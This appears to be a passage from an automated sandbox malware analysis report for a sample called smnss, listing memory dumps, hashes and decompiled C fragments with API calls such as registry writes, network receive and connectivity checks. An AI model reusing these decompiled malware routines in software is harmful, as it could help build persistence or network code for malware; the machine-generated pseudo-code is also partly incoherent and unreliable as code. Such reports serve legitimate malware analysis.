                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleSize
                                                                          • String ID: o7@
                                                                          • API String ID: 1378416451-1511109803
                                                                          • Opcode ID: 7affc5be1ed3ea77ba53b0a5fdcfd58173d39116c07c8aae6814327dab2883a3
                                                                          • Instruction ID: 007f44828535ddf31908dd088b9670435e6e0f876da8f20c920cfb81d13e3c29
                                                                          • Opcode Fuzzy Hash: 7affc5be1ed3ea77ba53b0a5fdcfd58173d39116c07c8aae6814327dab2883a3
                                                                          • Instruction Fuzzy Hash: 27014FB05083459BDB00AF75D1D935EBEF0AB5139CF004A6DE8815B2C2D3FE96488B97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E0040B740(intOrPtr* _a4) {
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				void** _v40;
                                                                          				intOrPtr* _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				intOrPtr _t37;
                                                                          				long _t39;
                                                                          				void* _t40;
                                                                          				void* _t41;
                                                                          				void* _t43;
                                                                          				void* _t47;
                                                                          				void* _t58;
                                                                          				void** _t61;
                                                                          				void* _t62;
                                                                          				intOrPtr* _t64;
                                                                          				void* _t68;
                                                                          				intOrPtr* _t72;
                                                                          				intOrPtr* _t76;
                                                                          				long* _t77;
                                                                          
                                                                          				_t37 =  *0x418284;
                                                                          				_t72 = _a4;
                                                                          				if(_t37 == 0) {
                                                                          					E0040B0E0(_t37);
                                                                          					_t37 =  *0x418284;
                                                                          					if( *((intOrPtr*)(_t37 + 0x30)) >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L18;
                                                                          					}
                                                                          					L8:
                                                                          					if(_t68 == 5) {
                                                                          						return 5;
                                                                          					} else {
                                                                          						if(_t68 != 0) {
                                                                          							L13:
                                                                          							_t43 = 3;
                                                                          							goto L14;
                                                                          						} else {
                                                                          							if(_t64 == 0) {
                                                                          								L5:
                                                                          								_t41 =  *_v24;
                                                                          								_v24 = _t41;
                                                                          								while(1) {
                                                                          									L6:
                                                                          									_t64 = 0;
                                                                          									_t68 = 5;
                                                                          									if(_t41 != 0) {
                                                                          										_t64 =  *((intOrPtr*)(_t41 + 0x18));
                                                                          										_t68 = 0;
                                                                          									}
                                                                          									goto L8;
                                                                          								}
                                                                          							} else {
                                                                          								_v40 = _t61;
                                                                          								_v44 = _t72;
                                                                          								 *_t76 = 1;
                                                                          								_v52 =  *_t72;
                                                                          								_v48 =  *((intOrPtr*)(_t72 + 4));
                                                                          								_v56 = 1;
                                                                          								_t47 =  *_t64();
                                                                          								if(1 == 6) {
                                                                          									 *((intOrPtr*)(_t72 + 0xc)) = 0;
                                                                          									 *((intOrPtr*)(_t72 + 0x10)) = _v24;
                                                                          									_v24 = _v20;
                                                                          									_t43 = E0040B6B0(_t72, _t61);
                                                                          									if(_t43 == 7) {
                                                                          										_t51 =  *0x418284;
                                                                          										_t62 = _v24;
                                                                          										if(_t51 == 0) {
                                                                          											E0040B0E0(_t51);
                                                                          											_t51 =  *0x418284;
                                                                          										}
                                                                          										if( *(_t51 + 0x30) < 0) {
                                                                          											E0040B3B0(_t62, _t74);
                                                                          											_t51 =  *0x418284;
                                                                          										}
                                                                          										_t74 =  *(_t51 + 0x30);
                                                                          										if( *(_t51 + 0x30) != 0) {
                                                                          											_v56 = _t62;
                                                                          											 *_t76 =  *((intOrPtr*)(_t51 + 0x2c));
                                                                          											if(TlsSetValue(??, ??) == 0) {
                                                                          												GetLastError();
                                                                          											}
                                                                          										} else {
                                                                          											 *((intOrPtr*)(_t51 + 0x28)) = _t62;
                                                                          										}
                                                                          										_t51 = _v24;
                                                                          										_t76 =  *((intOrPtr*)(_v24 + 0x28));
                                                                          										goto __ecx;
                                                                          									}
                                                                          									L14:
                                                                          									return _t43;
                                                                          								} else {
                                                                          									if(_t47 == 8) {
                                                                          										goto L5;
                                                                          									} else {
                                                                          										goto L13;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t37 + 0x30)) < 0) {
                                                                          						L18:
                                                                          						E0040B3B0(_t58, _t74);
                                                                          						_t37 =  *0x418284;
                                                                          					}
                                                                          				}
                                                                          				L2:
                                                                          				if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
                                                                          					_t39 = GetLastError();
                                                                          					 *_t76 =  *((intOrPtr*)(_t37 + 0x2c));
                                                                          					_t74 = _t39;
                                                                          					_t40 = TlsGetValue(??);
                                                                          					_t77 = _t76 - 4;
                                                                          					 *_t77 = _t39;
                                                                          					SetLastError(??);
                                                                          					_t41 = _t40;
                                                                          					_t76 = _t77 - 4;
                                                                          				} else {
                                                                          					_t41 =  *(_t37 + 0x28);
                                                                          				}
                                                                          				_v20 = _t41;
                                                                          				_t61 =  &_v24;
                                                                          				_v24 = _t41;
                                                                          				goto L6;
                                                                          			}



























                                                                          0x0040b749
                                                                          0x0040b74e
                                                                          0x0040b753
                                                                          0x0040b81c
                                                                          0x0040b821
                                                                          0x0040b82b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b798
                                                                          0x0040b79b
                                                                          0x0040b7ef
                                                                          0x0040b79d
                                                                          0x0040b79f
                                                                          0x0040b7d6
                                                                          0x0040b7d6
                                                                          0x00000000
                                                                          0x0040b7a1
                                                                          0x0040b7a3
                                                                          0x0040b780
                                                                          0x0040b783
                                                                          0x0040b785
                                                                          0x0040b788
                                                                          0x0040b788
                                                                          0x0040b788
                                                                          0x0040b78c
                                                                          0x0040b791
                                                                          0x0040b793
                                                                          0x0040b796
                                                                          0x0040b796
                                                                          0x00000000
                                                                          0x0040b791
                                                                          0x0040b7a5
                                                                          0x0040b7a5
                                                                          0x0040b7a9
                                                                          0x0040b7b2
                                                                          0x0040b7b9
                                                                          0x0040b7c2
                                                                          0x0040b7c6
                                                                          0x0040b7ca
                                                                          0x0040b7cf
                                                                          0x0040b840
                                                                          0x0040b84c
                                                                          0x0040b852
                                                                          0x0040b857
                                                                          0x0040b85f
                                                                          0x0040b865
                                                                          0x0040b86a
                                                                          0x0040b86f
                                                                          0x0040b893
                                                                          0x0040b898
                                                                          0x0040b898
                                                                          0x0040b876
                                                                          0x0040b8be
                                                                          0x0040b8c3
                                                                          0x0040b8c3
                                                                          0x0040b878
                                                                          0x0040b87d
                                                                          0x0040b8a2
                                                                          0x0040b8a6
                                                                          0x0040b8b4
                                                                          0x0040b8b6
                                                                          0x0040b8b6
                                                                          0x0040b87f
                                                                          0x0040b87f
                                                                          0x0040b87f
                                                                          0x0040b882
                                                                          0x0040b88e
                                                                          0x0040b891
                                                                          0x0040b891
                                                                          0x0040b7db
                                                                          0x0040b7e2
                                                                          0x0040b7d1
                                                                          0x0040b7d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b7d4
                                                                          0x0040b7cf
                                                                          0x0040b7a3
                                                                          0x0040b79f
                                                                          0x0040b759
                                                                          0x0040b75e
                                                                          0x0040b831
                                                                          0x0040b831
                                                                          0x0040b836
                                                                          0x0040b836
                                                                          0x0040b75e
                                                                          0x0040b764
                                                                          0x0040b769
                                                                          0x0040b7f3
                                                                          0x0040b7f9
                                                                          0x0040b7fc
                                                                          0x0040b7fe
                                                                          0x0040b804
                                                                          0x0040b809
                                                                          0x0040b80c
                                                                          0x0040b812
                                                                          0x0040b814
                                                                          0x0040b76f
                                                                          0x0040b76f
                                                                          0x0040b76f
                                                                          0x0040b772
                                                                          0x0040b775
                                                                          0x0040b778
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
                                                                          • Instruction ID: 45d732202371662b8addf3eaaaff00240ebc5fc11857fefe16626fd26bfd471c
                                                                          • Opcode Fuzzy Hash: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
                                                                          • Instruction Fuzzy Hash: C4413A75A002058FCB44EF69D684A6AB7F5FB88310F15857ED805AB3A1D738ED01CBDA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E0040B9C0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _t39;
                                                                          				long _t41;
                                                                          				void* _t42;
                                                                          				void* _t43;
                                                                          				void* _t47;
                                                                          				void* _t54;
                                                                          				void* _t64;
                                                                          				intOrPtr _t73;
                                                                          				intOrPtr* _t79;
                                                                          				long* _t80;
                                                                          
                                                                          				_t59 = __ebx;
                                                                          				_v8 = __edi;
                                                                          				_t73 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t39 =  *0x418284;
                                                                          				if(_t39 == 0) {
                                                                          					E0040B0E0(_t39);
                                                                          					_t39 =  *0x418284;
                                                                          					_t76 =  *(_t39 + 0x30);
                                                                          					if( *(_t39 + 0x30) >= 0) {
                                                                          						L2:
                                                                          						if( *(_t39 + 0x30) != 0) {
                                                                          							L9:
                                                                          							_t41 = GetLastError();
                                                                          							 *_t79 =  *((intOrPtr*)(_t39 + 0x2c));
                                                                          							_t76 = _t41;
                                                                          							_t42 = TlsGetValue(??);
                                                                          							_t80 = _t79 - 4;
                                                                          							 *_t80 = _t41;
                                                                          							SetLastError(??);
                                                                          							_t43 = _t42;
                                                                          							_v20 = _t43;
                                                                          							_v24 = _t43;
                                                                          							_t79 = _t80 - 4;
                                                                          							 *((intOrPtr*)(_t73 + 0xc)) = _a8;
                                                                          							 *((intOrPtr*)(_t73 + 0x10)) = _a12;
                                                                          							_t47 = E0040B8D0(_t73,  &_v24);
                                                                          							if(_t47 != 7) {
                                                                          								L4:
                                                                          								return _t47;
                                                                          							}
                                                                          							L11:
                                                                          							_t48 =  *0x418284;
                                                                          							_t64 = _v24;
                                                                          							if(_t48 == 0) {
                                                                          								E0040B0E0(_t48);
                                                                          								_t48 =  *0x418284;
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t48 + 0x30)) < 0) {
                                                                          								E0040B3B0(_t64, _t76);
                                                                          								_t48 =  *0x418284;
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t48 + 0x30)) != 0) {
                                                                          								_v40 = _t64;
                                                                          								 *_t79 =  *((intOrPtr*)(_t48 + 0x2c));
                                                                          								if(TlsSetValue(??, ??) == 0) {
                                                                          									GetLastError();
                                                                          								}
                                                                          							} else {
                                                                          								 *((intOrPtr*)(_t48 + 0x28)) = _t64;
                                                                          							}
                                                                          							_t48 = _v24;
                                                                          							_t79 =  *((intOrPtr*)(_v24 + 0x28));
                                                                          							goto __ecx;
                                                                          						}
                                                                          						L3:
                                                                          						_t54 =  *(_t39 + 0x28);
                                                                          						_v20 = _t54;
                                                                          						_v24 = _t54;
                                                                          						 *((intOrPtr*)(_t73 + 0xc)) = _a8;
                                                                          						 *((intOrPtr*)(_t73 + 0x10)) = _a12;
                                                                          						_t47 = E0040B8D0(_t73,  &_v24);
                                                                          						if(_t47 == 7) {
                                                                          							goto L11;
                                                                          						}
                                                                          						goto L4;
                                                                          					}
                                                                          					L7:
                                                                          					E0040B3B0(_t59, _t76);
                                                                          					_t39 =  *0x418284;
                                                                          					if( *(_t39 + 0x30) == 0) {
                                                                          						goto L3;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				_t76 =  *(_t39 + 0x30);
                                                                          				if( *(_t39 + 0x30) < 0) {
                                                                          					goto L7;
                                                                          				}
                                                                          				goto L2;
                                                                          			}



















                                                                          0x0040b9c0
                                                                          0x0040b9c6
                                                                          0x0040b9c9
                                                                          0x0040b9cc
                                                                          0x0040b9cf
                                                                          0x0040b9d2
                                                                          0x0040b9d9
                                                                          0x0040ba20
                                                                          0x0040ba25
                                                                          0x0040ba2a
                                                                          0x0040ba2f
                                                                          0x0040b9e2
                                                                          0x0040b9e7
                                                                          0x0040ba60
                                                                          0x0040ba63
                                                                          0x0040ba69
                                                                          0x0040ba6c
                                                                          0x0040ba6e
                                                                          0x0040ba74
                                                                          0x0040ba79
                                                                          0x0040ba7c
                                                                          0x0040ba82
                                                                          0x0040ba87
                                                                          0x0040ba8a
                                                                          0x0040ba90
                                                                          0x0040ba93
                                                                          0x0040ba99
                                                                          0x0040ba9e
                                                                          0x0040baa6
                                                                          0x0040ba11
                                                                          0x0040ba1d
                                                                          0x0040ba1d
                                                                          0x0040bab0
                                                                          0x0040bab0
                                                                          0x0040bab5
                                                                          0x0040baba
                                                                          0x0040bafd
                                                                          0x0040bb02
                                                                          0x0040bb02
                                                                          0x0040bac1
                                                                          0x0040bb09
                                                                          0x0040bb0e
                                                                          0x0040bb0e
                                                                          0x0040bac8
                                                                          0x0040bae1
                                                                          0x0040bae5
                                                                          0x0040baf3
                                                                          0x0040baf5
                                                                          0x0040baf5
                                                                          0x0040baca
                                                                          0x0040baca
                                                                          0x0040baca
                                                                          0x0040bacd
                                                                          0x0040bad9
                                                                          0x0040badc
                                                                          0x0040badc
                                                                          0x0040b9e9
                                                                          0x0040b9e9
                                                                          0x0040b9ef
                                                                          0x0040b9f2
                                                                          0x0040b9f8
                                                                          0x0040b9fe
                                                                          0x0040ba03
                                                                          0x0040ba0b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040ba0b
                                                                          0x0040ba40
                                                                          0x0040ba40
                                                                          0x0040ba45
                                                                          0x0040ba4f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040ba51
                                                                          0x0040b9db
                                                                          0x0040b9e0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value
                                                                          • String ID:
                                                                          • API String ID: 1883355122-0
                                                                          • Opcode ID: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
                                                                          • Instruction ID: 23407aeb104a5e4d22db15432d45e4df2a3b4d44022ab58e5814b8ef13b66587
                                                                          • Opcode Fuzzy Hash: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
                                                                          • Instruction Fuzzy Hash: A341F8B4B006198FCB50DF69D58099ABBF4FF08310B1585BAD919AB351E734AD00CFDA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402E21
                                                                          • lstrcat.KERNEL32 ref: 00402E3B
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402E63
                                                                          • lstrcat.KERNEL32 ref: 00402E85
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402EAA
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 898c4bd4d997bb76c47bea009e703a736dbde25d0b4ecf9e89ef0c3f0259d499
                                                                          • Instruction ID: f63abfe6bd6a6f6ba5da5a44fc92895626e452bfcf87627a9a73b7892de61845
                                                                          • Opcode Fuzzy Hash: 898c4bd4d997bb76c47bea009e703a736dbde25d0b4ecf9e89ef0c3f0259d499
                                                                          • Instruction Fuzzy Hash: 0021ECB59143048BCB10EF64D9816DEBBF0EF84314F40897FE584A3281EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00403C33), ref: 0040490E
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403C33), ref: 0040493C
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404974
                                                                          • RegCloseKey.ADVAPI32 ref: 00404982
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 503941690-0
                                                                          • Opcode ID: 64a7c2170a8598c629de1f1ef6930b91c6947248a2fba3b3b579a1264ac83601
                                                                          • Instruction ID: d52cf87232b6bef55ae32812e2a2d770b7a0cdaf13e0b01d7b079ce95a9ef0d7
                                                                          • Opcode Fuzzy Hash: 64a7c2170a8598c629de1f1ef6930b91c6947248a2fba3b3b579a1264ac83601
                                                                          • Instruction Fuzzy Hash: 8711C2F0808305AFDB00EF69C18575EBBF4BB84358F40892EE88897241E378D6488F92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E004067E0(void* __ebx, signed int _a4) {
                                                                          				void* _v8;
                                                                          				char _v1036;
                                                                          				signed int _v1040;
                                                                          				intOrPtr _v1044;
                                                                          				signed int _v1048;
                                                                          				signed int _t13;
                                                                          				signed int _t20;
                                                                          				signed int _t22;
                                                                          				void* _t23;
                                                                          				signed int* _t24;
                                                                          				intOrPtr* _t25;
                                                                          
                                                                          				_t24 = _t23 - 0x414;
                                                                          				_t20 =  &_v1036;
                                                                          				_v1044 = 0x400;
                                                                          				_v1048 = 0;
                                                                          				 *_t24 = _t20;
                                                                          				memset(__ebx, ??, ??);
                                                                          				_v1040 = 0;
                                                                          				_v1044 = 0x400;
                                                                          				_v1048 = _t20;
                                                                          				_t13 = _a4;
                                                                          				 *_t24 = _t13;
                                                                          				L004086B8();
                                                                          				_t25 = _t24 - 0x10;
                                                                          				_t22 = 0;
                                                                          				if(_t13 + 1 > 1) {
                                                                          					 *_t25 =  &_v1036;
                                                                          					_t22 = (E00406856( &_v1036, _t20) & 0xffffff00 | _t17 - 0x00000190 < 0x00000000) & 0x000000ff;
                                                                          				}
                                                                          				return _t22;
                                                                          			}














                                                                          0x004067e4
                                                                          0x004067ea
                                                                          0x004067f0
                                                                          0x004067f8
                                                                          0x00406800
                                                                          0x00406803
                                                                          0x00406808
                                                                          0x00406810
                                                                          0x00406818
                                                                          0x0040681c
                                                                          0x0040681f
                                                                          0x00406822
                                                                          0x00406827
                                                                          0x0040682b
                                                                          0x00406833
                                                                          0x0040683b
                                                                          0x0040684b
                                                                          0x0040684b
                                                                          0x00406854

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00406803
                                                                          • recv.WS2_32 ref: 00406822
                                                                            • Part of subcall function 00406856: lstrlen.KERNEL32(?,?,?), ref: 0040686A
                                                                            • Part of subcall function 00406856: sscanf.MSVCRT ref: 0040688E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlenmemsetrecvsscanf
                                                                          • String ID: fc@
                                                                          • API String ID: 2556557004-2333546356
                                                                          • Opcode ID: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
                                                                          • Instruction ID: 7b1cb7ca667fa739690624300255a696f657d489af5130fe59f4ce6b6cdf8f5c
                                                                          • Opcode Fuzzy Hash: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
                                                                          • Instruction Fuzzy Hash: CBF01DB05043049EDB00FF25C58535EBBE4AB44348F51886DE6C8A7382D638D5898B56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0040B460(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, int _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				int _v24;
                                                                          				void* _t20;
